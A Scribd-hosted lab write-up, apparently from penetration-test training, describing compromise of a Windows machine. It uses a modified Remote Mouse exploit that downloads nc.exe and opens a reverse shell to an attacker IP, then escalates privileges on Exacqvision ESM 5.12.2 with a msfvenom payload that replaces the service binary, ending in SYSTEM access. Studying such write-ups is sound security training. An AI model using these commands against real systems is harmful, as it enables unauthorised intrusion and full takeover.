Location via proxy:   [ UP ]  
[Report a bug]   [Manage cookies]                
Scribd Logo
Upload

Welcome to Scribd!

  • 98 views

    89 - Esm

    Uploaded by

    qzombexzombe114
    The document summarizes the findings of a vulnerability assessment on a machine located at 192.168.xx.89. Several open ports were discovered including port 21, 80, 139, 445, 1978, 1979, and 8090. Port 1978 was identified as the Remotemouse service which had a known exploit. This exploit was modified to launch a reverse shell back to the attacker's machine. User-level access was gained. Further enumeration revealed an exploitable Exacqvision ESM installation on port 8090. An exploit was used to replace the legitimate application file with a malicious one, granting system-level access when the machine restarted.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd

    89 - Esm

    Uploaded by

    qzombexzombe114
    98 views10 pages
    The document summarizes the findings of a vulnerability assessment on a machine located at 192.168.xx.89. Several open ports were discovered including port 21, 80, 139, 445, 1978, 1979, and 8090. Port 1978 was identified as the Remotemouse service which had a known exploit. This exploit was modified to launch a reverse shell back to the attacker's machine. User-level access was gained. Further enumeration revealed an exploitable Exacqvision ESM installation on port 8090. An exploit was used to replace the legitimate application file with a malicious one, granting system-level access when the machine restarted.

    Original Title

    89_-_ESM

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    The document summarizes the findings of a vulnerability assessment on a machine located at 192.168.xx.89. Several open ports were discovered including port 21, 80, 139, 445, 1978, 1979, and 8090. Port 1978 was identified as the Remotemouse service which had a known exploit. This exploit was modified to launch a reverse shell back to the attacker's machine. User-level access was gained. Further enumeration revealed an exploitable Exacqvision ESM installation on port 8090. An exploit was used to replace the legitimate application file with a malicious one, granting system-level access when the machine restarted.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Download as pdf or txt
    98 views10 pages

    89 - Esm

    Uploaded by

    qzombexzombe114
    The document summarizes the findings of a vulnerability assessment on a machine located at 192.168.xx.89. Several open ports were discovered including port 21, 80, 139, 445, 1978, 1979, and 8090. Port 1978 was identified as the Remotemouse service which had a known exploit. This exploit was modified to launch a reverse shell back to the attacker's machine. User-level access was gained. Further enumeration revealed an exploitable Exacqvision ESM installation on port 8090. An exploit was used to replace the legitimate application file with a malicious one, granting system-level access when the machine restarted.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Download as pdf or txt
    You are on page 1of 10

    89 ESM Writeup

    1 | Page
    .89 Machine

    Open ports

    21 ..... file zilla


    80 ....... apache exacq esm
    135
    139
    445
    1978 remoutemouse
    1979
    1980
    8090 ....... apache 2.4.43 ... /project/

    21: can connect anonymously


    There is project.zip you can download

    Zip file contains:

    .editorconfig

    On 8090

    With that name of the zip file

    192.168.xx.89:8090/project/
    Tried to enum
    Found a laravel app

    Folders:

    2 | Page
    .env file contains a app key
    (Tried msf and decrypting .env or exploiting it with .env key but not work)

    Also on

    /storage/framwork/sessions/
    Found sessions

    But that is useless.

    We noticed that 1978 port is open. We googled it and we found that port is for remotemouse

    https://wintelguy.com/port-search/1978

    Or simply

    Nmap 192.168.xx.89 -p1978 -nv

    the response is SIN 15win nop nop 300

    3 | Page
    We found the exploit for the remoutemouse

    https://www.exploit-db.com/exploits/46697

    But it need some modifications to work properly

    The modified part by adding one liner powershell reverse_shell

    Ref:

    https://hackersinterview.com/oscp/reverse-shell-one-liners-oscp-cheatsheet/

    4 | Page
    5 | Page
    Add the ip and port

    Open terminal

    Nc -lnvp 445

    Run the exploit

    Then you are user.

    Alternative: you can also do it with nc.exe

    (GOLDEN)

    First upload ncat

    def PopCalc(ip):
    MoveMouse(-5000,3000,ip)
    MousePress(mouse.leftClick,ip)
    sleep(2)
    SendString('''powershell''',ip)
    sleep(3)
    SendString("\n",ip)
    sleep(5)
    SendString('''Invoke-WebRequest -Uri 'http://192.168.101.13/nc.exe' -OutFile
    C:\Users\Public\nc.exe ''',ip)
    6 | Page
    sleep(1)
    SendString("\n",ip)
    sleep(1)
    print("SUCCESS! Process calc.exe has run on target",ip)

    Then edit again the exploit with:

    def PopCalc(ip):
    MoveMouse(-5000,3000,ip)
    MousePress(mouse.leftClick,ip)
    sleep(1)
    SendString('''cmd.exe''',ip)
    sleep(1)
    SendString("\n",ip)
    sleep(1)
    SendString(“C:\Users\Public\nc.exe 192.168.101.13 1212 -e cmd.exe",ip)
    sleep(1)
    SendString("\n",ip)
    sleep(1)
    print("SUCCESS! Process calc.exe has run on target",ip)

    Or

    7 | Page
    Privesc:

    Enumerating reveals the vulnerable services

    Exacqvision ESM is likely vilnerable

    Which is on port 8090

    We found the version on login form

    exacqVision ESM 5.12.2

    8 | Page
    We found the privesc exploit

    9 | Page
    1. Generate malicious .exe on attacking machine
    msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.163 LPORT=443 -f exe >
    /var/www/html/enterprisesystemmanager.exe

    2. Setup listener and ensure apache is running on attacking machine


    nc -nlvvp 443
    service apache2 start

    3. Download malicious .exe on victim machine


    Powershell invoke-WebRequest -Uri 'http://192.168.101.13/enterprisesystemmanager.exe’ -OutFile C:\Users\Public\
    enterprisesystemmanager.exe

    4. Rename C:\exacqVisionEsm\EnterpriseSystemManager\enterprisesystemmanager.exe
    enterprisesystemmanager.exe > enterprisesystemmanager.bak

    5. Copy/Move downloaded enterprisesystemmanager.exe file to


    C:\exacqVisionEsm\EnterpriseSystemManager\

    6. Restart victim machine


    Shutdown /r

    and setup a listener `nc -nvlp 80’

    7. Reverse Shell on attacking machine opens


    C:\Windows\system32>whoami
    whoami
    nt authority\system

    10 | Page

    You might also like